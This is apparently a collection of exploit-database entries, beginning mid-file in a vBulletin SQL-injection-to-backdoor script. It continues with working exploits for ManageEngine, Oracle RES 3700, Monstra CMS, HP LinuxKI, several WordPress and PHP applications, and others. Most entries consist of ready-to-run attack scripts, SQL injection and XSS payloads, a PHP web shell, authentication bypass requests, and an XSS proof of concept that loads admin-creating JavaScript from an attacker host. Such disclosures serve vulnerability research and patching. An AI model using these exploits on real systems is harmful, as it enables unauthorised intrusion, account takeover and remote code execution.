'securitytoken':sToken} oResponse = getData(sURL + sPath, lData) if not oResponse.code == 200: print('[!] Error submitting page content for ' + sPageName) ## Finally saving the new page sPath = 'admin/savepage' lData = {'input[ishomeroute]':'0', 'input[pageid]':'0', 'input[nodeid]':'0', 'input[userid]':'1', 'input[screenlayoutid]':'2', 'input[templatetitle]':sPageName, 'input[displaysections[0]]':'[{"widgetId":"23","widgetInstanceId":"' + sWidgetInstanceID + '"}]', 'input[displaysections[1]]':'[]', 'input[displaysections[2]]':'[]', 'input[displaysections[3]]':'[]', 'input[pagetitle]':sPageName, 'input[resturl]':sPageName, 'input[metadescription]':'Photubias+Shell', 'input[pagetemplateid]':sPageTemplateID, 'url':sURL, 'securitytoken':sToken} oResponse = getData(sURL + sPath, lData) if not oResponse.code == 200: print('[!] Error saving page content for ' + sPageName) return sPageName def main(): if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-12720.py <URL> <CMD>') print(' Example: ./CVE-2020-12720.py http://192.168.50.130/ "cat /etc/passwd"') print(' But for now, ask questions then') sURL = input('[?] Please enter the address and path to vBulletin ([http://192.168.50.130/): ') if sURL == '': sURL = 'http://192.168.50.130' else: sURL = sys.argv[1] sCMD = sys.argv[2] if not sURL[:-1] == '/': sURL += '/' if not sURL[:4].lower() == 'http': sURL = 'http://' + sURL print('[+] Welcome, first verifying the SQLi vulnerability') if verifyBug(sURL): print("----\n" + '[+] Attempting automatic admin account takeover') sUSERID = takeoverAccount(sURL, sNEWPASS) sADMINPASS = sNEWPASS if sUSERID == '': sUSERID = '1' sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ') else: sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ') print("----\n"+'[+] So far so good, attempting the creation of the backdoor') sPageName = createBackdoor(sURL, sADMINPASS, sUSERID) if len(sys.argv) == 1: sCMD = input('[?] Please enter the command to run [id]: ') if sCMD == '': sCMD = 'id' sCmd = urllib.parse.quote(sCMD) sPath = sPageName + "?cmd=" + sCmd print('[+] Opening '+sURL + sPath) try: oRequest = urllib.request.Request(url = sURL + sPath) oResponse = oOpener.open(oRequest, timeout = iTimeout) print('#######################') sResponse = oResponse.read().decode() print('[+] Command result:') print(sResponse.split('###SHELLRESULT###')[1]) except: print('[-] Something went wrong, bad command?') sys.exit(1) if __name__ == "__main__": main()

# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection # Exploit Author: jul10l1r4 (Julio Lira) # Google Dork: N/A # Date: 2020-05-16 # Vendor Homepage: https://mikrotik.com # Software Link: https://mikrotik.com/download # Version: <= 1.2.3 # Tested on: Debian 10 buster # CVE: 2020-13118 Description: SQL Injection found in check_community.php:49 $community = $_GET['community']; $_SESSION['community'] = $community; $query = "SELECT name from router where `community`=' $community'"; PoC: http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI SQLmap using: sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3

# Exploit Title: ManageEngine Service Desk 10.0 - Cross-Site Scripting # Date: 2020-05-14 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/service-desk/download.html # Version: 10.0 (10000.0.0.0) # Tested on: Windows 10 # CVE : CVE-2019-15083 [SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]------------------------------ SECURITY ADVISORY: SPUK-2019-04/ManageEngine Service Desk XSS in remote IT Assets Management Affected Software: ManageEngine Service Desk Plus (version 10.0, installer version 10000.0.0.0, SHA1: 86EA684666CE85AF710CA9805B7FF37E3D4FD65D) Vulnerability: Cross-Site Scripting CVE: CVE-2019-15083 CVSSv3: 5.9 (CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N) Severity: Medium Release Date: 2020-05-14 I. Background ~~~~~~~~~~~~~ From ManageEngine's website: "ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike. Version Enterprise: help desk + ITIL + asset + project The complete ITIL ready ITSM suite with all features that an IT service desk needs. * Incident management * Problem management * Change management * IT project management * Service catalog * Asset management * CMDB" II. Description ~~~~~~~~~~~~~~~ From wks administrator to Manage Engine Administrator: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default installations of "ManageEngine ServiceDesk Plus 10.0" were found to be vulnerable to a XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute JavaScript code on the Manage Engine ServiceDesk administrator side. On "Asset Home > Server > <workstation> > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names on the column "Software". In this field and probably in others, a remote attacker can inject malicious code in order to execute it when the ManageEngine admnistrator visualizes this page. In this case, the provided proof of concept creates a administrator user on ManageEngine Service Desk. PoC: ~~~~ 1. Access to the workstation managed by ManageEngine with a local administrator account. 2. Open regedit.exe as administrator 3. Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<program>" 4. Change the current "DisplayName" to this value: test</a><script src=http://<attacker_ip>/addadmin.js type="text/javascript"/><a>bla 5. On the root of <attacker_ip> web server, deploy the file "addadmin.js" with this content: var createAdminParams= "sdpcsrfparam=<TOKEN>&mode=new&loginPermitted=null&loggedUserId=4&userID=-1&divToShow=listView&firstName=Legituser+4&middleName=L&lastName=Inocent+4&fullName=Legituser+4+L+Inocent+4&ciTypeId=6&ciId=null&employeeID=666&CI_BaseElement_IMPACTID=null&ciDescription=&ciName=Legituser+4+L+Inocent+4&email=&phone=&mobile=&smsID=&cost=0.00&deptName=None&reportingToid=&reportingTo=&jobTitle=&isSDSiteAdmin=false&associatedSites=null&projectrole=null&canApproveSR=false&approveLimitValue=&provideLogin=on&sdpAPIKey=&apiKeyExpiry=&userName=legituser4&addNewLogin=true&userPwd=legituser&confirmUserPwd=legituser&userDomain=None&isAdmin=SDAdmin&assignedRoles=2&dcRole=DCAdmin&froModuleForUDF=TECH&addButton=Save"; // Save the CSRF cookie into a variable var sdpcsrfcookie; carr = document.cookie.split(";"); for (i=0;i<carr.length;i++){ if (carr[i].split("=")[0].trim() == "sdpcsrfcookie"){ sdpcsrfcookie=carr[i].split("=")[1].trim(); } } if (sdpcsrfcookie === undefined){ console.log("No CSRF cookie was found. Aborting the PoC :-(") } else { var ajaxreq = new XMLHttpRequest(); ajaxreq.open('POST', '/TechnicianDef.do'); ajaxreq.withCredentials = true; ajaxreq.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml"); ajaxreq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); console.log("Creating a new user on Manage Engine with CSRF token: "+sdpcsrfcookie); // Update the CSRF token parameter with the token present in the user cookie params = createAdminParams.replace("<TOKEN>",sdpcsrfcookie); console.log("posting to create a new admin user: "+params); ajaxreq.send(params); } 6. Reboot the workstation to forthe the agent to update the program list. 7. Now, login as the administrator of ManageEngine SelfService. 8. Navigate to "Asset Home > Server > <workstation> > software" 9. Click on "Next" button until the software name is visualized on the table. 10. Now, go to "Admin > Users > Technicians" and verify that the administrator user "legituser4 " has been created. III. Impact ~~~~~~~~~~~ The XSS can be injected remotely from any workstation that is being managed by ManageEngine ServiceDesk with no need for the attacker to access the web application. This PoC shows the creation of an administrator of ManageEngine, but it can be potentially used to create Domain Admin users if the service is configured properly, therefore, compromising the whole domain where the workstation is in. CVSS 3.0 Score: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N IV. Remediation ~~~~~~~~~~~~~~~ Sanitize all the input from the remote agents before showing the values in the web page. Use typical XSS protection also for values that are not directly input on web formularies of the application. V. Disclosure ~~~~~~~~~~~~~ Reported By: Felipe Molina de la Torre (Felipe (at) SensePost.com) Vendor Informed: 2019-04-30 Patch Release Date: 2019-04-16 Publick Ack. of the vuln: 2020-05-13 Advisory Release Date: 2020-05-14 ---------------------------------[SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]---

# Exploit Title: Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection # Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang # Google Dork: N/A # Date: 2020-05-18 # Vendor Homepage: https://connekthq.com/plugins/ajax-load-more/ # Software Link: https://vi.wordpress.org/plugins/ajax-load-more/ # Version: <= 5.3.1 # Tested on: Ubuntu 18.04 Description: A blind SQL injection vulnerability is present in Ajax load more. $wpdb->get_var("SELECT repeaterDefault FROM " . $table_name . " WHERE name = '$n'"); POC: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: lab-pwn.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://lab-pwn.com/wordpress/wp-admin/admin.php?page=ajax-load-more-repeaters Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 597 Origin: http://lab-pwn.com Connection: close Cookie: wordpress_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cab29a771b72eed2d65f02d50fd24ea85ae85f38d0fcc41abb56797fb8c7590a3; wordpress_logged_in_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cb14c3363c0174d9eb93e2d2bbdd3627b293ea3e8fa8a1080325f62bb462938e2; wp-settings-time-1=1589773793; PHPSESSID=0lsvlo9il6ibjiuflljl3qcub1 action=alm_update_repeater&value=%3Cli+%3C%3Fphp+if+(!has_post_thumbnail())+%7B+%3F%3E+class%3D%22no-img%22%3C%3Fphp+%7D+%3F%3E%3E%0A+++%3C%3Fphp+if+(+has_post_thumbnail()+)+%7B+the_post_thumbnail('alm-thumbnail')%3B+%7D%3F%3E%0A+++%3Ch3%3E%3Ca+href%3D%22%3C%3Fphp+the_permalink()%3B+%3F%3E%22+title%3D%22%3C%3Fphp+the_title()%3B+%3F%3E%22%3E%3C%3Fphp+the_title()%3B+%3F%3E%3C%2Fa%3E%3C%2Fh3%3E%0A+++%3Cp+class%3D%22entry-meta%22%3E%3C%3Fphp+the_time(%22F+d%2C+Y%22)%3B+%3F%3E%3C%2Fp%3E%0A+++%3C%3Fphp+the_excerpt()%3B+%3F%3E%0A%3C%2Fli%3E&repeater=' or sleep(5)#&type=test&alias=&nonce=ae68ab8c91 SQL map: custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] [12:43:16] [INFO] resuming back-end DBMS 'mysql' [12:43:16] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: action=alm_update_repeater&value=<li <?php if (!has_post_thumbnail()) { ?> class="no-img"<?php } ?>> <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail'); }?> <h3><a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3> <p class="entry-meta"><?php the_time("F d, Y"); ?></p> <?php the_excerpt(); ?> </li>&repeater=-2104' OR 5557=5557-- dHBa#&type=test&alias=&nonce=ae68ab8c91 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: action=alm_update_repeater&value=<li <?php if (!has_post_thumbnail()) { ?> class="no-img"<?php } ?>> <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail'); }?> <h3><a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3> <p class="entry-meta"><?php the_time("F d, Y"); ?></p> <?php the_excerpt(); ?> </li>&repeater=' OR (SELECT 3214 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(3214=3214,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- AHqK#&type=test&alias=&nonce=ae68ab8c91 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: action=alm_update_repeater&value=<li <?php if (!has_post_thumbnail()) { ?> class="no-img"<?php } ?>> <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail'); }?> <h3><a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3> <p class="entry-meta"><?php the_time("F d, Y"); ?></p> <?php the_excerpt(); ?> </li>&repeater=' OR SLEEP(5)-- pExJ#&type=test&alias=&nonce=ae68ab8c91 --- [12:43:17] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx back-end DBMS: MySQL >= 5.0

# Exploit Title: Online Examination System 1.0 - 'eid' SQL Injection # Google Dork: N/A # Date: 2020-05-16 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14210/online-examination-system-project-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineexamination.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A #Description: Online Examination System Project is vulnerable to SQL injection via the 'eid' parameter on the account.php page. # Create a new account and Move to the profile on top right side (click) # vulnerable file : account.php # vulnerable Parameter: eid http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5 Parameter: eid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: q=quiz&step=2&eid=5589741f9ed52' AND 1509=1509 AND 'aIOb'='aIOb&n=1&t=5 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4105 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(4105=4105,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ytnk'='Ytnk&n=1&t=5 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4498 FROM (SELECT(SLEEP(5)))EAAg) AND 'OoDV'='OoDV&n=1&t=5 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: q=quiz&step=2&eid=5589741f9ed52' UNION ALL SELECT NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL-- iOWr&n=1&t=5 --- [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.39, PHP 7.2.18 back-end DBMS: MySQL >= 5.0 # Proof of Concept: http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=sqli&n=1&t=5 http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 GET /onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=l61egdpolqmktgtuoedjqmktge Connection: keep-alive Upgrade-Insecure-Requests: 1 q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5

# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution # Date: 2019-10-01 # Exploit Author: Walid Faour # Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/ # Software Link: N/A (Available to customers) # Version: <= v5.7 # Tested on: Windows Server 2003 / Windows Server 2008 # CVE : CVE-2019-3025 #!/usr/bin/env python #Author: Walid Faour #Date: Aug. 2, 2019 #Oracle Hospitality RES 3700 Release 4.9 Exploit import binascii import requests print print '-------------------------------------------------' print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit' print '-------------------------------------------------' print IP = raw_input("Enter the IP address: ") URL = "http://" + IP + ":50123" f = open("attacker-4.9.exe",'rb') raw_payload = f.read() payload_hex = binascii.hexlify(raw_payload) f.close() g = open("attacker-4.9.job",'rb') raw_task = g.read() scheduled_task_hex = binascii.hexlify(raw_task) g.close() def exploit_body(data,full_path): body = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> \ <SOAP-ENV:Body xmlns:MCRS-ENV="MCRS-URI"> \ <MCRS-ENV:Service>MDSSYSUTILS</MCRS-ENV:Service> \ <MCRS-ENV:Method>TransferFile</MCRS-ENV:Method> \ <MCRS-ENV:SessionKey>Session</MCRS-ENV:SessionKey> \ <MCRS-ENV:InputParameters> \ <dst>' + full_path + '</dst> \ <fn>' + full_path + '</fn> \ <data>' + data + '</data> \ </MCRS-ENV:InputParameters> \ </SOAP-ENV:Body> \ </SOAP-ENV:Envelope>' return body def exploit_headers(body): headers = { "Content-Type" : "text/xml", "User-Agent" : "MDS POS Client", "Host" : IP + ":50123", "Content-Length" : str(len(body)), "Connection" : "Keep-Alive" } return headers print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...' body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe") body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job") send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload)) send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task))

# Exploit Title: Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload # Google Dork: N/A # Date: 2020-05-18 # Exploit Author: Kishan Lal Choudhary # Vendor Homepage: https://monstra.org # Software Link: https://bitbucket.org/awilum/monstra/downloads/monstra-3.0.4.zip # Version: 3.0.4 # Tested on: Ubuntu 1. Goto: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/ 2. Upload a one liner shell with php7 extenstion ie: shell.php7 #burp request ------------------------------------EOF----------------------------------------------------- POST /monstra/admin/index.php?id=filesmanager HTTP/1.1 Host: 192.168.2.5 Content-Length: 548 Cache-Control: max-age=0 Origin: http://192.168.2.5 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7 Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328 Connection: close ------WebKitFormBoundarytRfyCkYq8NvztDBf Content-Disposition: form-data; name="csrf" 2e6ae2353998caa319aae262b113c6b3f17a9636 ------WebKitFormBoundarytRfyCkYq8NvztDBf Content-Disposition: form-data; name="file"; filename="shell.php7" Content-Type: application/octet-stream <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> ------WebKitFormBoundarytRfyCkYq8NvztDBf Content-Disposition: form-data; name="upload_file" Upload ------WebKitFormBoundarytRfyCkYq8NvztDBf-- ------------------------------------EOF----------------------------------------------------- 3. trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id We have successfully got Remote Code execution

# Exploit Title: forma.lms The E-Learning Suite 2.3.0.2 - Persistent Cross-Site Scripting # Date: 2020-05-15 # Exploit Author: Daniel Ortiz # Vendor Homepage: https://sourceforge.net/projects/forma/ # Software link: https://sourceforge.net/projects/forma/files/latest/download # Tested on: XAMPP for Linux 64bit 5.6.40-0 ## 1 -Course Module - Vulnerable parameter: course_code, course_name, course_box_descr, course_descr - Payload: <SCRIPT>alert('XSS');</SCRIPT> - Details: There is no control or security mechanism on this field. Specials characters are not encoded or filtered. - Privileges: It requires admin. - Location: Admin Area > E-learning > Courses > Courses > Edit Course - Endopoint: /formalms/appCore/index.php?r=alms/course/modcourse ## 1 -Profile Module - Vulnerable parameter: Email - Payload: <div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onmouseover=alert('xss') )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div> - Details: There is some control on this field but can bypassed. - Privileges: Do not requires admin or student account. - Location: My Profile > Edit > Put the payload in Email field. - Endpoint: /formalms/appLms/index.php?r=lms/profile/show&ap=saveinfo

# Exploit Title: online Chatting System 1.0 - 'id' SQL Injection # Google Dork: N/A # Date: 2020-05-17 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14224/online-chatting-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinechatting.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Discription: The online Chatting System v1.0 application is vulnerable to SQL injection via the 'id' parameter on the chatroom.php page. # vulnerable file : chatroom.php http://localhost/chat_system/user/chatroom.php?id=5 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=5' AND 2674=2674 AND 'NdtA'='NdtA Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=5' AND (SELECT 8144 FROM(SELECT COUNT(*),CONCAT(0x7171717a71,(SELECT (ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIwS'='OIwS Type: time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id=5' AND 4648=BENCHMARK(5000000,MD5(0x67644874)) AND 'oSJd'='oSJd --- [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 7.2.18 back-end DBMS: MySQL >= 5.0 # Proof of Concept: http://localhost/chat_system/user/chatroom.php?id=5 GET /chat_system/user/chatroom.php?id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mstb1630gvh0f97me7qdh5f7ke Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 id=5%27%20AND%20(SELECT%208144%20FROM(SELECT%20COUNT(*),CONCAT(0x7171717a71,(SELECT%20(ELT(8144=8144,1))),0x71766b7a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27OIwS%27=%27OIwS

# Exploit Title: Online Healthcare management system 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-05-16 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlinehealthcare.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : admin/index.php || admin/login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/onlinehealthcare/admin/login.php POST /onlinehealthcare/admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------293261110021842 Content-Length: 356 Referer: http://localhost/onlinehealthcare/admin/index.php Cookie: _ga=GA1.1.1353584531.1478253768 Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------293261110021842: undefined Content-Disposition: form-data; name="username" '=''or' -----------------------------293261110021842 Content-Disposition: form-data; name="password" '=''or' -----------------------------293261110021842 Content-Disposition: form-data; name="login" -----------------------------293261110021842--

# Exploit Title: Online Healthcare Patient Record Management System 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-05-18 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14217/online-healthcare-patient-record-management-system-using-phpmysql.html # Version: N/A # Tested on: Kali Linux 2020.2 x64 # CVE : N/A The Online Healthcare Patient Record Management System suffers from multiple authentication bypass vulnerabilities: The login.php file allows a user to just supply ‘ or 1=1 – as a username and whatever password and bypass the authentication <?php session_start(); if(ISSET($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error()); $query = $conn->query("SELECT * FROM `user` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error()); The same happens with login.php for the admin area: <?php session_start(); $username = $_POST['username']; $password = $_POST['password']; if(ISSET($_POST['login'])){ $conn = new mysqli("localhost", "root", "", "hcpms") or die(mysqli_error()); $query = $conn->query("SELECT *FROM `admin` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error()); $fetch = $query->fetch_array(); $valid = $query->num_rows; if($valid > 0){ $_SESSION['admin_id'] = $fetch['admin_id']; header("location:home.php"); There is also an authentication bypass issue located in add_user.php: <?php if(ISSET($_POST['save_user'])){ $username = $_POST['username']; $password = $_POST['password']; $firstname = $_POST['firstname']; $middlename = $_POST['middlename']; $lastname = $_POST['lastname']; $section = $_POST['section']; $conn = new mysqli("localhost", "root", "", "hcpms"); $q1 = $conn->query("SELECT * FROM `user` WHERE `username` = '$username'") or die(mysqli_error()); $f1 = $q1->fetch_array(); $c1 = $q1->num_rows; if($c1 > 0){ echo "<script>alert('Username already taken')</script>"; }else{ $conn->query("INSERT INTO `user` VALUES('', '$username', '$password', '$firstname', '$middlename', '$lastname', '$section')"); header("location: user.php"); } } If a request is made with the required parameters, any user can create an admin account (no authentication is required to do this). Finally, there are many SQL injection vulnerabilities (GET parameters directly passed to SQL queries), but those are authenticated

Exploit Title: HP LinuxKI 6.01 - Remote Command Injection Date: 2020-05-17 Exploit Author: Cody Winkler Vendor Homepage: https://www.hpe.com/us/en/home.html Software Link: https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-1 Version: <= v6.0-1 Tested on: LinuxKI Docker Image CVE: CVE-2020-7209 #!/usr/bin/env python3 import requests import argparse import sys import re def parse_options(): formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=50) parser = argparse.ArgumentParser(description='HP LinuxKI <= 6.0-1 RCE - CVE-2020-7209', formatter_class=formatter) parser.add_argument("-i", "--ip", dest='host', type=str, help="Target Hostname/IP", required=True) parser.add_argument("-p", "--port", dest='port', type=str, help="Target Port", required=True) parser.add_argument("-c", "--cmd", dest='cmd', type=str, help="Command to execute", required=True) args = parser.parse_args() return args def main(args): host = args.host port = args.port cmd = args.cmd path = '/linuxki/experimental/vis/kivis.php?type=kitrace&pid=15;echo BEGIN;%s;echo END;' % cmd rce = requests.get('http://' + host + ':' + port + path, verify=False) output = rce.text a, b = output.find('BEGIN'), output.find('END') print(output[a+6:b]) if __name__ in "__main__": args = parse_options() main(args)

# Exploit Title: Victor CMS 1.0 - 'cat_id' SQL Injection # Google Dork: N/A # Date: 2020-05-19 # Exploit Author: Kishan Lal Choudhary # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 Description: The GET parameter 'category.php?cat_id=' is vulnerable to SQL Injection Payload: UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+-- http://localhost/category.php?cat_id=-1+UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+-- By exploiting the SQL Injection vulnerability by using the mentioned payload, an attacker will be able to retrieve the database name and version of mysql running on the server.

